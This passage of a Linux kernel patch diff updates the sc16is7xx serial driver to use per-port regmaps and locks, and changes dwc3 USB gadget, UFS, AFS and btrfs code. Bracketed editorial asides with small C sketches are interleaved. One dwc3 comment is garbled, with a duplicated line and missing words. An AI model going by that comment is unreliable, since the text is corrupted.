+ 	if (config.flags & SC16IS7XX_RECONF_MD) {
+ 		u8 mcr = 0;
+@@ -943,9 +916,9 @@ static void sc16is7xx_ms_proc(struct kthread_work *ws)
+ 	struct sc16is7xx_port *s = dev_get_drvdata(one->port.dev);
+ 
+ 	if (one->port.state) {
+-		mutex_lock(&s->efr_lock);
++		mutex_lock(&one->efr_lock);
+ 		sc16is7xx_update_mlines(one);
+-		mutex_unlock(&s->efr_lock);
++		mutex_unlock(&one->efr_lock);
+ 
+ 		kthread_queue_delayed_work(&s->kworker, &one->ms_work, HZ);
+ 	}
+@@ -978,18 +951,18 @@ static void sc16is7xx_throttle(struct uart_port *port)
+ 	 * value set in MCR register. Stop reading data from RX FIFO so the
+ 	 * AutoRTS feature will de-activate RTS output.
+ 	 */
+-	spin_lock_irqsave(&port->lock, flags);
++	uart_port_lock_irqsave(port, &flags);
+ 	sc16is7xx_ier_clear(port, SC16IS7XX_IER_RDI_BIT);
+-	spin_unlock_irqrestore(&port->lock, flags);
++	uart_port_unlock_irqrestore(port, flags);
+ }
+ 
+ static void sc16is7xx_unthrottle(struct uart_port *port)
+ {
+ 	unsigned long flags;
+ 
+-	spin_lock_irqsave(&port->lock, flags);
++	uart_port_lock_irqsave(port, &flags);
+ 	sc16is7xx_ier_set(port, SC16IS7XX_IER_RDI_BIT);
+-	spin_unlock_irqrestore(&port->lock, flags);
++	uart_port_unlock_irqrestore(port, flags);
+ }
+ 
+ static unsigned int sc16is7xx_tx_empty(struct uart_port *port)
+@@ -1029,7 +1002,6 @@ static void sc16is7xx_set_termios(struct uart_port *port,
+ 				  struct ktermios *termios,
+ 				  const struct ktermios *old)
+ {
+-	struct sc16is7xx_port *s = dev_get_drvdata(port->dev);
+ 	struct sc16is7xx_one *one = to_sc16is7xx_one(port, port);
+ 	unsigned int lcr, flow = 0;
+ 	int baud;
+@@ -1088,13 +1060,13 @@ static void sc16is7xx_set_termios(struct uart_port *port,
+ 		port->ignore_status_mask |= SC16IS7XX_LSR_BRK_ERROR_MASK;
+ 
+ 	/* As above, claim the mutex while accessing the EFR. */
+-	mutex_lock(&s->efr_lock);
++	mutex_lock(&one->efr_lock);
+ 
+ 	sc16is7xx_port_write(port, SC16IS7XX_LCR_REG,
+ 			     SC16IS7XX_LCR_CONF_MODE_B);
+ 
+ 	/* Configure flow control */
+-	regcache_cache_bypass(s->regmap, true);
++	regcache_cache_bypass(one->regmap, true);
+ 	sc16is7xx_port_write(port, SC16IS7XX_XON1_REG, termios->c_cc[VSTART]);
+ 	sc16is7xx_port_write(port, SC16IS7XX_XOFF1_REG, termios->c_cc[VSTOP]);
+ 
+@@ -1113,12 +1085,12 @@ static void sc16is7xx_set_termios(struct uart_port *port,
+ 			      SC16IS7XX_EFR_REG,
+ 			      SC16IS7XX_EFR_FLOWCTRL_BITS,
+ 			      flow);
+-	regcache_cache_bypass(s->regmap, false);
++	regcache_cache_bypass(one->regmap, false);
+ 
+ 	/* Update LCR register */
+ 	sc16is7xx_port_write(port, SC16IS7XX_LCR_REG, lcr);
+ 
+-	mutex_unlock(&s->efr_lock);
++	mutex_unlock(&one->efr_lock);
+ 
+ 	/* Get baud rate generator configuration */
+ 	baud = uart_get_baud_rate(port, termios, old,
+@@ -1128,7 +1100,7 @@ static void sc16is7xx_set_termios(struct uart_port *port,
+ 	/* Setup baudrate generator */
+ 	baud = sc16is7xx_set_baud(port, baud);
+ 
+-	spin_lock_irqsave(&port->lock, flags);
++	uart_port_lock_irqsave(port, &flags);
+ 
+ 	/* Update timeout according to new baud rate */
+ 	uart_update_timeout(port, termios->c_cflag, baud);
+@@ -1136,7 +1108,7 @@ static void sc16is7xx_set_termios(struct uart_port *port,
+ 	if (UART_ENABLE_MS(port, termios->c_cflag))
+ 		sc16is7xx_enable_ms(port);
+ 
+-	spin_unlock_irqrestore(&port->lock, flags);
++	uart_port_unlock_irqrestore(port, flags);
+ }
+ 
+ static int sc16is7xx_config_rs485(struct uart_port *port, struct ktermios *termios,
+@@ -1164,7 +1136,6 @@ static int sc16is7xx_config_rs485(struct uart_port *port, struct ktermios *termi
+ static int sc16is7xx_startup(struct uart_port *port)
+ {
+ 	struct sc16is7xx_one *one = to_sc16is7xx_one(port, port);
+-	struct sc16is7xx_port *s = dev_get_drvdata(port->dev);
+ 	unsigned int val;
+ 	unsigned long flags;
+ 
+@@ -1181,7 +1152,7 @@ static int sc16is7xx_startup(struct uart_port *port)
+ 	sc16is7xx_port_write(port, SC16IS7XX_LCR_REG,
+ 			     SC16IS7XX_LCR_CONF_MODE_B);
+ 
+-	regcache_cache_bypass(s->regmap, true);
++	regcache_cache_bypass(one->regmap, true);
+ 
+ 	/* Enable write access to enhanced features and internal clock div */
+ 	sc16is7xx_port_update(port, SC16IS7XX_EFR_REG,
+@@ -1199,7 +1170,7 @@ static int sc16is7xx_startup(struct uart_port *port)
+ 			     SC16IS7XX_TCR_RX_RESUME(24) |
+ 			     SC16IS7XX_TCR_RX_HALT(48));
+ 
+-	regcache_cache_bypass(s->regmap, false);
++	regcache_cache_bypass(one->regmap, false);
+ 
+ 	/* Now, initialize the UART */
+ 	sc16is7xx_port_write(port, SC16IS7XX_LCR_REG, SC16IS7XX_LCR_WORD_LEN_8);
+@@ -1223,9 +1194,9 @@ static int sc16is7xx_startup(struct uart_port *port)
+ 	sc16is7xx_port_write(port, SC16IS7XX_IER_REG, val);
+ 
+ 	/* Enable modem status polling */
+-	spin_lock_irqsave(&port->lock, flags);
++	uart_port_lock_irqsave(port, &flags);
+ 	sc16is7xx_enable_ms(port);
+-	spin_unlock_irqrestore(&port->lock, flags);
++	uart_port_unlock_irqrestore(port, flags);
+ 
+ 	return 0;
+ }
+@@ -1427,7 +1398,8 @@ static int sc16is7xx_setup_gpio_chip(struct sc16is7xx_port *s)
+ /*
+  * Configure ports designated to operate as modem control lines.
+  */
+-static int sc16is7xx_setup_mctrl_ports(struct sc16is7xx_port *s)
++static int sc16is7xx_setup_mctrl_ports(struct sc16is7xx_port *s,
++				       struct regmap *regmap)
+ {
+ 	int i;
+ 	int ret;
+@@ -1456,8 +1428,8 @@ static int sc16is7xx_setup_mctrl_ports(struct sc16is7xx_port *s)
+ 
+ 	if (s->mctrl_mask)
+ 		regmap_update_bits(
+-			s->regmap,
+-			SC16IS7XX_IOCONTROL_REG << SC16IS7XX_REG_SHIFT,
++			regmap,
++			SC16IS7XX_IOCONTROL_REG,
+ 			SC16IS7XX_IOCONTROL_MODEM_A_BIT |
+ 			SC16IS7XX_IOCONTROL_MODEM_B_BIT, s->mctrl_mask);
+ 
+@@ -1472,7 +1444,7 @@ static const struct serial_rs485 sc16is7xx_rs485_supported = {
+ 
+ static int sc16is7xx_probe(struct device *dev,
+ 			   const struct sc16is7xx_devtype *devtype,
+-			   struct regmap *regmap, int irq)
++			   struct regmap *regmaps[], int irq)
+ {
+ 	unsigned long freq = 0, *pfreq = dev_get_platdata(dev);
+ 	unsigned int val;
+@@ -1480,16 +1452,20 @@ static int sc16is7xx_probe(struct device *dev,
+ 	int i, ret;
+ 	struct sc16is7xx_port *s;
+ 
+-	if (IS_ERR(regmap))
+-		return PTR_ERR(regmap);
++	for (i = 0; i < devtype->nr_uart; i++)
++		if (IS_ERR(regmaps[i]))
++			return PTR_ERR(regmaps[i]);
+ 
+ 	/*
+ 	 * This device does not have an identification register that would
+ 	 * tell us if we are really connected to the correct device.
+ 	 * The best we can do is to check if communication is at all possible.
++	 *
++	 * Note: regmap[0] is used in the probe function to access registers
++	 * common to all channels/ports, as it is guaranteed to be present on
++	 * all variants.
+ 	 */
+-	ret = regmap_read(regmap,
+-			  SC16IS7XX_LSR_REG << SC16IS7XX_REG_SHIFT, &val);
++	ret = regmap_read(regmaps[0], SC16IS7XX_LSR_REG, &val);
+ 	if (ret < 0)
+ 		return -EPROBE_DEFER;
+ 
+@@ -1523,10 +1499,8 @@ static int sc16is7xx_probe(struct device *dev,
+ 			return -EINVAL;
+ 	}
+ 
+-	s->regmap = regmap;
+ 	s->devtype = devtype;
+ 	dev_set_drvdata(dev, s);
+-	mutex_init(&s->efr_lock);
+ 
+ 	kthread_init_worker(&s->kworker);
+ 	s->kworker_task = kthread_run(kthread_worker_fn, &s->kworker,
+@@ -1538,11 +1512,17 @@ static int sc16is7xx_probe(struct device *dev,
+ 	sched_set_fifo(s->kworker_task);
+ 
+ 	/* reset device, purging any pending irq / data */
+-	regmap_write(s->regmap, SC16IS7XX_IOCONTROL_REG << SC16IS7XX_REG_SHIFT,
+-			SC16IS7XX_IOCONTROL_SRESET_BIT);
++	regmap_write(regmaps[0], SC16IS7XX_IOCONTROL_REG,
++		     SC16IS7XX_IOCONTROL_SRESET_BIT);
+ 
+ 	for (i = 0; i < devtype->nr_uart; ++i) {
+-		s->p[i].line		= i;
++		s->p[i].port.line = find_first_zero_bit(&sc16is7xx_lines,
++							SC16IS7XX_MAX_DEVS);
++		if (s->p[i].port.line >= SC16IS7XX_MAX_DEVS) {
++			ret = -ERANGE;
++			goto out_ports;
++		}
++
+ 		/* Initialize port data */
+ 		s->p[i].port.dev	= dev;
+ 		s->p[i].port.irq	= irq;
+@@ -1562,12 +1542,9 @@ static int sc16is7xx_probe(struct device *dev,
+ 		s->p[i].port.rs485_supported = sc16is7xx_rs485_supported;
+ 		s->p[i].port.ops	= &sc16is7xx_ops;
+ 		s->p[i].old_mctrl	= 0;
+-		s->p[i].port.line	= sc16is7xx_alloc_line();
++		s->p[i].regmap		= regmaps[i];
+ 
+-		if (s->p[i].port.line >= SC16IS7XX_MAX_DEVS) {
+-			ret = -ENOMEM;
+-			goto out_ports;
+-		}
++		mutex_init(&s->p[i].efr_lock);
+ 
+ 		ret = uart_get_rs485_mode(&s->p[i].port);
+ 		if (ret)
+@@ -1584,20 +1561,25 @@ static int sc16is7xx_probe(struct device *dev,
+ 		kthread_init_work(&s->p[i].tx_work, sc16is7xx_tx_proc);
+ 		kthread_init_work(&s->p[i].reg_work, sc16is7xx_reg_proc);
+ 		kthread_init_delayed_work(&s->p[i].ms_work, sc16is7xx_ms_proc);
++
+ 		/* Register port */
+-		uart_add_one_port(&sc16is7xx_uart, &s->p[i].port);
++		ret = uart_add_one_port(&sc16is7xx_uart, &s->p[i].port);
++		if (ret)
++			goto out_ports;
++
++		set_bit(s->p[i].port.line, &sc16is7xx_lines);
+ 
+ 		/* Enable EFR */
+ 		sc16is7xx_port_write(&s->p[i].port, SC16IS7XX_LCR_REG,
+ 				     SC16IS7XX_LCR_CONF_MODE_B);
+ 
+-		regcache_cache_bypass(s->regmap, true);
++		regcache_cache_bypass(regmaps[i], true);
+ 
+ 		/* Enable write access to enhanced features */
+ 		sc16is7xx_port_write(&s->p[i].port, SC16IS7XX_EFR_REG,
+ 				     SC16IS7XX_EFR_ENABLE_BIT);
+ 
+-		regcache_cache_bypass(s->regmap, false);
++		regcache_cache_bypass(regmaps[i], false);
+ 
+ 		/* Restore access to general registers */
+ 		sc16is7xx_port_write(&s->p[i].port, SC16IS7XX_LCR_REG, 0x00);
+@@ -1617,7 +1599,7 @@ static int sc16is7xx_probe(struct device *dev,
+ 				s->p[u].irda_mode = true;
+ 	}
+ 
+-	ret = sc16is7xx_setup_mctrl_ports(s);
++	ret = sc16is7xx_setup_mctrl_ports(s, regmaps[0]);
+ 	if (ret)
+ 		goto out_ports;
+ 
+@@ -1652,10 +1634,9 @@ static int sc16is7xx_probe(struct device *dev,
+ #endif
+ 
+ out_ports:
+-	for (i--; i >= 0; i--) {
+-		uart_remove_one_port(&sc16is7xx_uart, &s->p[i].port);
+-		clear_bit(s->p[i].port.line, &sc16is7xx_lines);
+-	}
++	for (i = 0; i < devtype->nr_uart; i++)
++		if (test_and_clear_bit(s->p[i].port.line, &sc16is7xx_lines))
++			uart_remove_one_port(&sc16is7xx_uart, &s->p[i].port);
+ 
+ 	kthread_stop(s->kworker_task);
+ 
+@@ -1677,8 +1658,8 @@ static void sc16is7xx_remove(struct device *dev)
+ 
+ 	for (i = 0; i < s->devtype->nr_uart; i++) {
+ 		kthread_cancel_delayed_work_sync(&s->p[i].ms_work);
+-		uart_remove_one_port(&sc16is7xx_uart, &s->p[i].port);
+-		clear_bit(s->p[i].port.line, &sc16is7xx_lines);
++		if (test_and_clear_bit(s->p[i].port.line, &sc16is7xx_lines))
++			uart_remove_one_port(&sc16is7xx_uart, &s->p[i].port);
+ 		sc16is7xx_power(&s->p[i].port, 0);
+ 	}
+ 
+@@ -1700,19 +1681,42 @@ static const struct of_device_id __maybe_unused sc16is7xx_dt_ids[] = {
+ MODULE_DEVICE_TABLE(of, sc16is7xx_dt_ids);
+ 
+ static struct regmap_config regcfg = {
+-	.reg_bits = 7,
+-	.pad_bits = 1,
++	.reg_bits = 5,
++	.pad_bits = 3,
+ 	.val_bits = 8,
+ 	.cache_type = REGCACHE_RBTREE,
+ 	.volatile_reg = sc16is7xx_regmap_volatile,
+ 	.precious_reg = sc16is7xx_regmap_precious,
++	.writeable_noinc_reg = sc16is7xx_regmap_noinc,
++	.readable_noinc_reg = sc16is7xx_regmap_noinc,
++	.max_raw_read = SC16IS7XX_FIFO_SIZE,
++	.max_raw_write = SC16IS7XX_FIFO_SIZE,
++	.max_register = SC16IS7XX_EFCR_REG,
+ };
+ 
++static const char *sc16is7xx_regmap_name(u8 port_id)
++{
++	switch (port_id) {
++	case 0:	return "port0";
++	case 1:	return "port1";
++	default:
++		WARN_ON(true);
++		return NULL;
++	}
++}
++
++static unsigned int sc16is7xx_regmap_port_mask(unsigned int port_id)
++{
++	/* CH1,CH0 are at bits 2:1. */
++	return port_id << 1;
++}
++
+ #ifdef CONFIG_SERIAL_SC16IS7XX_SPI
+ static int sc16is7xx_spi_probe(struct spi_device *spi)
+ {
+ 	const struct sc16is7xx_devtype *devtype;
+-	struct regmap *regmap;
++	struct regmap *regmaps[2];
++	unsigned int i;
+ 	int ret;
+ 
+ 	/* Setup SPI bus */
+@@ -1737,11 +1741,20 @@ static int sc16is7xx_spi_probe(struct spi_device *spi)
+ 		devtype = (struct sc16is7xx_devtype *)id_entry->driver_data;
+ 	}
+ 
+-	regcfg.max_register = (0xf << SC16IS7XX_REG_SHIFT) |
+-			      (devtype->nr_uart - 1);
+-	regmap = devm_regmap_init_spi(spi, &regcfg);
++	for (i = 0; i < devtype->nr_uart; i++) {
++		regcfg.name = sc16is7xx_regmap_name(i);
++		/*
++		 * If read_flag_mask is 0, the regmap code sets it to a default
++		 * of 0x80. Since we specify our own mask, we must add the READ
++		 * bit ourselves:
++		 */
++		regcfg.read_flag_mask = sc16is7xx_regmap_port_mask(i) |
++			SC16IS7XX_SPI_READ_BIT;
++		regcfg.write_flag_mask = sc16is7xx_regmap_port_mask(i);
++		regmaps[i] = devm_regmap_init_spi(spi, &regcfg);
++	}
+ 
+-	return sc16is7xx_probe(&spi->dev, devtype, regmap, spi->irq);
++	return sc16is7xx_probe(&spi->dev, devtype, regmaps, spi->irq);
+ }
+ 
+ static void sc16is7xx_spi_remove(struct spi_device *spi)
+@@ -1780,7 +1793,8 @@ static int sc16is7xx_i2c_probe(struct i2c_client *i2c,
+ 			       const struct i2c_device_id *id)
+ {
+ 	const struct sc16is7xx_devtype *devtype;
+-	struct regmap *regmap;
++	struct regmap *regmaps[2];
++	unsigned int i;
+ 
+ 	if (i2c->dev.of_node) {
+ 		devtype = device_get_match_data(&i2c->dev);
+@@ -1790,11 +1804,14 @@ static int sc16is7xx_i2c_probe(struct i2c_client *i2c,
+ 		devtype = (struct sc16is7xx_devtype *)id->driver_data;
+ 	}
+ 
+-	regcfg.max_register = (0xf << SC16IS7XX_REG_SHIFT) |
+-			      (devtype->nr_uart - 1);
+-	regmap = devm_regmap_init_i2c(i2c, &regcfg);
++	for (i = 0; i < devtype->nr_uart; i++) {
++		regcfg.name = sc16is7xx_regmap_name(i);
++		regcfg.read_flag_mask = sc16is7xx_regmap_port_mask(i);
++		regcfg.write_flag_mask = sc16is7xx_regmap_port_mask(i);
++		regmaps[i] = devm_regmap_init_i2c(i2c, &regcfg);
++	}
+ 
+-	return sc16is7xx_probe(&i2c->dev, devtype, regmap, i2c->irq);
++	return sc16is7xx_probe(&i2c->dev, devtype, regmaps, i2c->irq);
+ }
+ 
+ static void sc16is7xx_i2c_remove(struct i2c_client *client)
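[Editorial aside on the per-channel regmap change above: the SC16IS7xx command byte packs a 5-bit register field over 3 low bits, and the hunks route channel selection through the regmap read/write flag masks instead of encoding it in the register number. A minimal userspace sketch of that byte layout follows; the helper names and the main() driver are illustrative, not kernel API.]

#include <stdint.h>
#include <stdio.h>

#define SPI_READ_BIT  0x80               /* bit 7: read transfer on SPI */

static uint8_t port_mask(unsigned int port_id)
{
	return port_id << 1;             /* CH1,CH0 live at bits 2:1 */
}

static uint8_t spi_read_cmd(uint8_t reg, unsigned int port_id)
{
	/*
	 * reg_bits = 5, pad_bits = 3 (as in the regcfg above): the register
	 * number occupies the upper bits, leaving bits 2:0 free for the
	 * channel bits; the read flag is OR'd in via read_flag_mask.
	 */
	return (reg << 3) | port_mask(port_id) | SPI_READ_BIT;
}

int main(void)
{
	/* Reading LSR (0x03) on port 1 yields command byte 0x9a. */
	printf("read LSR on port 1 -> 0x%02x\n", spi_read_cmd(0x03, 1));
	return 0;
}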
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index 474e94a69b185..9fd4e9ed93b8b 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -8333,12 +8333,9 @@ static void ufshcd_async_scan(void *data, async_cookie_t cookie)
+ 
+ out:
+ 	pm_runtime_put_sync(hba->dev);
+-	/*
+-	 * If we failed to initialize the device or the device is not
+-	 * present, turn off the power/clocks etc.
+-	 */
++
+ 	if (ret)
+-		ufshcd_hba_exit(hba);
++		dev_err(hba->dev, "%s failed: %d\n", __func__, ret);
+ }
+ 
+ static const struct attribute_group *ufshcd_driver_groups[] = {
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index 137602d9076fd..c4703f6b20894 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -139,6 +139,24 @@ int dwc3_gadget_set_link_state(struct dwc3 *dwc, enum dwc3_link_state state)
+ 	return -ETIMEDOUT;
+ }
+ 
++static void dwc3_ep0_reset_state(struct dwc3 *dwc)
++{
++	unsigned int	dir;
++
++	if (dwc->ep0state != EP0_SETUP_PHASE) {
++		dir = !!dwc->ep0_expect_in;
++		if (dwc->ep0state == EP0_DATA_PHASE)
++			dwc3_ep0_end_control_data(dwc, dwc->eps[dir]);
++		else
++			dwc3_ep0_end_control_data(dwc, dwc->eps[!dir]);
++
++		dwc->eps[0]->trb_enqueue = 0;
++		dwc->eps[1]->trb_enqueue = 0;
++
++		dwc3_ep0_stall_and_restart(dwc);
++	}
++}
++
+ /**
+  * dwc3_ep_inc_trb - increment a trb index.
+  * @index: Pointer to the TRB index to increment.
+@@ -2075,7 +2093,17 @@ static int dwc3_gadget_ep_dequeue(struct usb_ep *ep,
+ 
+ 	list_for_each_entry(r, &dep->pending_list, list) {
+ 		if (r == req) {
+-			dwc3_gadget_giveback(dep, req, -ECONNRESET);
++			/*
++			 * Explicitly check for EP0/1 as dequeue for those
++			 * Explicitly check for EP0/1, as dequeue for those
++			 * EPs needs to be handled differently.  Control EP
++			 * occur during dwc3_ep0_stall_and_restart().  EP0
++			 * requests are never added to started_list.
++			 */
++			if (dep->number > 1)
++				dwc3_gadget_giveback(dep, req, -ECONNRESET);
++			else
++				dwc3_ep0_reset_state(dwc);
+ 			goto out;
+ 		}
+ 	}
+@@ -2552,16 +2580,9 @@ static int dwc3_gadget_soft_disconnect(struct dwc3 *dwc)
+ 		ret = wait_for_completion_timeout(&dwc->ep0_in_setup,
+ 				msecs_to_jiffies(DWC3_PULL_UP_TIMEOUT));
+ 		if (ret == 0) {
+-			unsigned int    dir;
+-
+ 			dev_warn(dwc->dev, "wait for SETUP phase timed out\n");
+ 			spin_lock_irqsave(&dwc->lock, flags);
+-			dir = !!dwc->ep0_expect_in;
+-			if (dwc->ep0state == EP0_DATA_PHASE)
+-				dwc3_ep0_end_control_data(dwc, dwc->eps[dir]);
+-			else
+-				dwc3_ep0_end_control_data(dwc, dwc->eps[!dir]);
+-			dwc3_ep0_stall_and_restart(dwc);
++			dwc3_ep0_reset_state(dwc);
+ 			spin_unlock_irqrestore(&dwc->lock, flags);
+ 		}
+ 	}
+@@ -3848,16 +3869,14 @@ static void dwc3_gadget_disconnect_interrupt(struct dwc3 *dwc)
+ 	dwc->setup_packet_pending = false;
+ 	usb_gadget_set_state(dwc->gadget, USB_STATE_NOTATTACHED);
+ 
+-	if (dwc->ep0state != EP0_SETUP_PHASE) {
+-		unsigned int    dir;
++	dwc3_ep0_reset_state(dwc);
+ 
+-		dir = !!dwc->ep0_expect_in;
+-		if (dwc->ep0state == EP0_DATA_PHASE)
+-			dwc3_ep0_end_control_data(dwc, dwc->eps[dir]);
+-		else
+-			dwc3_ep0_end_control_data(dwc, dwc->eps[!dir]);
+-		dwc3_ep0_stall_and_restart(dwc);
+-	}
++	/*
++	 * Request PM idle to address the condition where the usage count
++	 * is already decremented to zero, but the driver is still waiting
++	 * for the disconnect interrupt to set dwc->connected to FALSE.
++	 */
++	pm_request_idle(dwc->dev);
+ }
+ 
+ static void dwc3_gadget_reset_interrupt(struct dwc3 *dwc)
+@@ -3913,20 +3932,7 @@ static void dwc3_gadget_reset_interrupt(struct dwc3 *dwc)
+ 	 * phase. So ensure that EP0 is in setup phase by issuing a stall
+ 	 * and restart if EP0 is not in setup phase.
+ 	 */
+-	if (dwc->ep0state != EP0_SETUP_PHASE) {
+-		unsigned int	dir;
+-
+-		dir = !!dwc->ep0_expect_in;
+-		if (dwc->ep0state == EP0_DATA_PHASE)
+-			dwc3_ep0_end_control_data(dwc, dwc->eps[dir]);
+-		else
+-			dwc3_ep0_end_control_data(dwc, dwc->eps[!dir]);
+-
+-		dwc->eps[0]->trb_enqueue = 0;
+-		dwc->eps[1]->trb_enqueue = 0;
+-
+-		dwc3_ep0_stall_and_restart(dwc);
+-	}
++	dwc3_ep0_reset_state(dwc);
+ 
+ 	/*
+ 	 * In the Synopsys DesignWare Cores USB3 Databook Rev. 3.30a
+diff --git a/fs/afs/dir.c b/fs/afs/dir.c
+index 07dc4ec73520c..cf811b77ee671 100644
+--- a/fs/afs/dir.c
++++ b/fs/afs/dir.c
+@@ -473,6 +473,14 @@ static int afs_dir_iterate_block(struct afs_vnode *dvnode,
+ 			continue;
+ 		}
+ 
++		/* Don't expose silly rename entries to userspace. */
++		if (nlen > 6 &&
++		    dire->u.name[0] == '.' &&
++		    ctx->actor != afs_lookup_filldir &&
++		    ctx->actor != afs_lookup_one_filldir &&
++		    memcmp(dire->u.name, ".__afs", 6) == 0)
++			continue;
++
+ 		/* found the next entry */
+ 		if (!dir_emit(ctx, dire->u.name, nlen,
+ 			      ntohl(dire->u.vnode),
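[The afs hunk above filters silly-rename artifacts out of a plain readdir while still letting the two lookup filldir actors see them. Extracted as a standalone predicate to make the matching rule explicit; this helper is hypothetical, not kernel API.]

#include <stdbool.h>
#include <string.h>

static bool is_afs_silly_rename(const char *name, size_t nlen)
{
	/* ".__afsXXXX" entries are at least 7 chars and start ".__afs". */
	return nlen > 6 && name[0] == '.' && memcmp(name, ".__afs", 6) == 0;
}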
+diff --git a/fs/btrfs/ctree.h b/fs/btrfs/ctree.h
+index 27d06bb5e5c05..cca1acf2e0371 100644
+--- a/fs/btrfs/ctree.h
++++ b/fs/btrfs/ctree.h
+@@ -1552,6 +1552,7 @@ struct btrfs_drop_extents_args {
+ 
+ struct btrfs_file_private {
+ 	void *filldir_buf;
++	u64 last_index;
+ };
+ 
+ 
+diff --git a/fs/btrfs/delayed-inode.c b/fs/btrfs/delayed-inode.c
+index 1331e56e8e84f..c6426080cf0ad 100644
+--- a/fs/btrfs/delayed-inode.c
++++ b/fs/btrfs/delayed-inode.c
+@@ -1665,6 +1665,7 @@ int btrfs_inode_delayed_dir_index_count(struct btrfs_inode *inode)
+ }
+ 
+ bool btrfs_readdir_get_delayed_items(struct inode *inode,
++				     u64 last_index,
+ 				     struct list_head *ins_list,
+ 				     struct list_head *del_list)
+ {
+@@ -1684,14 +1685,14 @@ bool btrfs_readdir_get_delayed_items(struct inode *inode,
+ 
+ 	mutex_lock(&delayed_node->mutex);
+ 	item = __btrfs_first_delayed_insertion_item(delayed_node);
+-	while (item) {
++	while (item && item->index <= last_index) {
+ 		refcount_inc(&item->refs);
+ 		list_add_tail(&item->readdir_list, ins_list);
+ 		item = __btrfs_next_delayed_item(item);
+ 	}
+ 
+ 	item = __btrfs_first_delayed_deletion_item(delayed_node);
+-	while (item) {
++	while (item && item->index <= last_index) {
+ 		refcount_inc(&item->refs);
+ 		list_add_tail(&item->readdir_list, del_list);
+ 		item = __btrfs_next_delayed_item(item);
+diff --git a/fs/btrfs/delayed-inode.h b/fs/btrfs/delayed-inode.h
+index 0163ca637a96f..fc6fae9640f82 100644
+--- a/fs/btrfs/delayed-inode.h
++++ b/fs/btrfs/delayed-inode.h
+@@ -148,6 +148,7 @@ void btrfs_destroy_delayed_inodes(struct btrfs_fs_info *fs_info);
+ 
+ /* Used for readdir() */
+ bool btrfs_readdir_get_delayed_items(struct inode *inode,
++				     u64 last_index,
+ 				     struct list_head *ins_list,
+ 				     struct list_head *del_list);
+ void btrfs_readdir_put_delayed_items(struct inode *inode,
+diff --git a/fs/btrfs/extent-tree.c b/fs/btrfs/extent-tree.c
+index 2a7c9088fe1f8..0d2cc186974d5 100644
+--- a/fs/btrfs/extent-tree.c
++++ b/fs/btrfs/extent-tree.c
+@@ -1209,7 +1209,8 @@ static int btrfs_issue_discard(struct block_device *bdev, u64 start, u64 len,
+ 	u64 bytes_left, end;
+ 	u64 aligned_start = ALIGN(start, 1 << 9);
+ 
+-	if (WARN_ON(start != aligned_start)) {
++	/* Adjust the range to be aligned to 512B sectors if necessary. */
++	if (start != aligned_start) {
+ 		len -= aligned_start - start;
+ 		len = round_down(len, 1 << 9);
+ 		start = aligned_start;
+@@ -4206,6 +4207,42 @@ static int prepare_allocation_clustered(struct btrfs_fs_info *fs_info,
+ 	return 0;
+ }
+ 
++static int prepare_allocation_zoned(struct btrfs_fs_info *fs_info,
++				    struct find_free_extent_ctl *ffe_ctl)
++{
++	if (ffe_ctl->for_treelog) {
++		spin_lock(&fs_info->treelog_bg_lock);
++		if (fs_info->treelog_bg)
++			ffe_ctl->hint_byte = fs_info->treelog_bg;
++		spin_unlock(&fs_info->treelog_bg_lock);
++	} else if (ffe_ctl->for_data_reloc) {
++		spin_lock(&fs_info->relocation_bg_lock);
++		if (fs_info->data_reloc_bg)
++			ffe_ctl->hint_byte = fs_info->data_reloc_bg;
++		spin_unlock(&fs_info->relocation_bg_lock);
++	} else if (ffe_ctl->flags & BTRFS_BLOCK_GROUP_DATA) {
++		struct btrfs_block_group *block_group;
++
++		spin_lock(&fs_info->zone_active_bgs_lock);
++		list_for_each_entry(block_group, &fs_info->zone_active_bgs, active_bg_list) {
++			/*
++			 * No lock is OK here because avail is monotonically
++			 * decreasing, and this is just a hint.
++			 */
++			u64 avail = block_group->zone_capacity - block_group->alloc_offset;
++
++			if (block_group_bits(block_group, ffe_ctl->flags) &&
++			    avail >= ffe_ctl->num_bytes) {
++				ffe_ctl->hint_byte = block_group->start;
++				break;
++			}
++		}
++		spin_unlock(&fs_info->zone_active_bgs_lock);
++	}
++
++	return 0;
++}
++
+ static int prepare_allocation(struct btrfs_fs_info *fs_info,
+ 			      struct find_free_extent_ctl *ffe_ctl,
+ 			      struct btrfs_space_info *space_info,
+@@ -4216,19 +4253,7 @@ static int prepare_allocation(struct btrfs_fs_info *fs_info,
+ 		return prepare_allocation_clustered(fs_info, ffe_ctl,
+ 						    space_info, ins);
+ 	case BTRFS_EXTENT_ALLOC_ZONED:
+-		if (ffe_ctl->for_treelog) {
+-			spin_lock(&fs_info->treelog_bg_lock);
+-			if (fs_info->treelog_bg)
+-				ffe_ctl->hint_byte = fs_info->treelog_bg;
+-			spin_unlock(&fs_info->treelog_bg_lock);
+-		}
+-		if (ffe_ctl->for_data_reloc) {
+-			spin_lock(&fs_info->relocation_bg_lock);
+-			if (fs_info->data_reloc_bg)
+-				ffe_ctl->hint_byte = fs_info->data_reloc_bg;
+-			spin_unlock(&fs_info->relocation_bg_lock);
+-		}
+-		return 0;
++		return prepare_allocation_zoned(fs_info, ffe_ctl);
+ 	default:
+ 		BUG();
+ 	}
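[The btrfs_issue_discard() change above replaces a WARN_ON with a silent adjustment of unaligned ranges. A worked example of the same 512-byte alignment math, as a self-contained userspace sketch; ALIGN/round_down are reimplemented locally and the numbers are made up.]

#include <stdint.h>
#include <stdio.h>

#define ALIGN_UP(x, a)    (((x) + (a) - 1) & ~((uint64_t)(a) - 1))
#define ROUND_DOWN(x, a)  ((x) & ~((uint64_t)(a) - 1))

int main(void)
{
	uint64_t start = 1000, len = 5000;         /* unaligned request */
	uint64_t aligned_start = ALIGN_UP(start, 1 << 9);

	if (start != aligned_start) {
		len  -= aligned_start - start;     /* drop the leading slack */
		len   = ROUND_DOWN(len, 1 << 9);   /* trim a partial tail sector */
		start = aligned_start;
	}
	/* Prints: discard [1024, +4608) */
	printf("discard [%llu, +%llu)\n",
	       (unsigned long long)start, (unsigned long long)len);
	return 0;
}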
+diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
+index 9a7d77c410e22..82f92b5652a77 100644
+--- a/fs/btrfs/inode.c
++++ b/fs/btrfs/inode.c
